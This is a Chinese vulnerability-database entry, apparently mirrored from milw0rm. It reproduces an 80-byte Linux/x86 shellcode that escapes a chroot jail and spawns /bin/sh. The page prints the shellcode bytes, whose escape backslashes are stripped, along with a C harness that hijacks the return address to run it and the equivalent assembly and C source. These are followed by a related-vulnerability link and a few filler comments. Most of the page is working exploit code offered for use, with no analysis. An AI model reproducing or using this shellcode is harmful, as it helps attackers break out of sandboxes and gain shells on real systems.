Linux/x86 – Break chroot + execve(/bin/sh) Shellcode (80 bytes)
漏洞ID | 1054620 | 漏洞类型 | |
发布时间 | 2004-09-12 | 更新时间 | 2004-09-12 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some *
* ideas how to make it smaller, but till then use this one. *
* signed predator *
* linux registered user : 181116 *
* preedator(at)sendmail(dot)ru *
***************************************************************************/
char sc[]="x31xc0x31xdbx31xc9xb0x17xcdx80xebx36x5ex88x46x0a"
"x8dx5ex05xb1xedxb0x27xcdx80x31xc0xb0x3dxcdx80x83"
"xc3x02xb0x0cxcdx80xe0xfaxb0x3dxcdx80x89x76x08x31"
"xc0x88x46x07x89x46x0cx89xf3x8dx4ex08x89xc2xb0x0b"
"xcdx80xe8xc5xffxffxff/bin/sh..";
int main(){
int *ret=(int *)(&ret+2);
printf("len : %dn",strlen(sc));
*ret=(int)sc;
}
// Asm code
/*********************************************
*int main(){ *
* __asm__(" xorl %eax,%eax n" *
* " xorl %ebx,%ebx n" *
* " xorl %ecx,%ecx n" *
* " movb $0x17,%al n" *
* " int $0x80 n" *
* " jmp 0x36 n" *
* " popl %esi n" *
* " movb %al,0xa(%esi) n" *
* " leal 0x5(%esi),%ebx n" *
* " movb $0xed,%cl n" *
* " movb $0x27,%al n" *
* " int $0x80 n" *
* " xorl %eax,%eax n" *
* " movb $0x3d,%al n" *
* " int $0x80 n" *
* " addl $0x2,%ebx n" *
* " movb $0xc,%al n" *
* " int $0x80 n" *
* " loopne -0x06 n" *
* " movb $0x3d,%al n" *
* " int $0x80 n" *
* " movl %esi,0x8(%esi) n" *
* " xorl %eax,%eax n" *
* " movb %al,0x7(%esi) n" *
* " movl %eax,0xc(%esi) n" *
* " movl %esi,%ebx n" *
* " leal 0x8(%esi),%ecx n" *
* " movl %eax,%edx n" *
* " movb $0xb,%al n" *
* " int $0x80 n" *
* " call -0x3b n" *
* " .string "/bin/sh.." n"); *
*} *
*********************************************/
//C code
/**********************************************
*int main(){ *
* char *sh[2]={"/bin/sh",NULL}; *
* int gg=0xed *
* mkdir("sh..",gg); *
* chroot("sh.."); *
* while (gg!=0){ *
* chdir("..");gg--; *
* } *
* chroot(".."); *
* execve(sh[0],sh,NULL); *
*} *
***********************************************/
// milw0rm.com [2004-09-12]
相关推荐: Avant Browser Long HTTP Request Buffer Overflow Vulnerability
Avant Browser Long HTTP Request Buffer Overflow Vulnerability 漏洞ID 1099697 漏洞类型 Boundary Condition Error 发布时间 2003-08-21 更新时间 2003…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666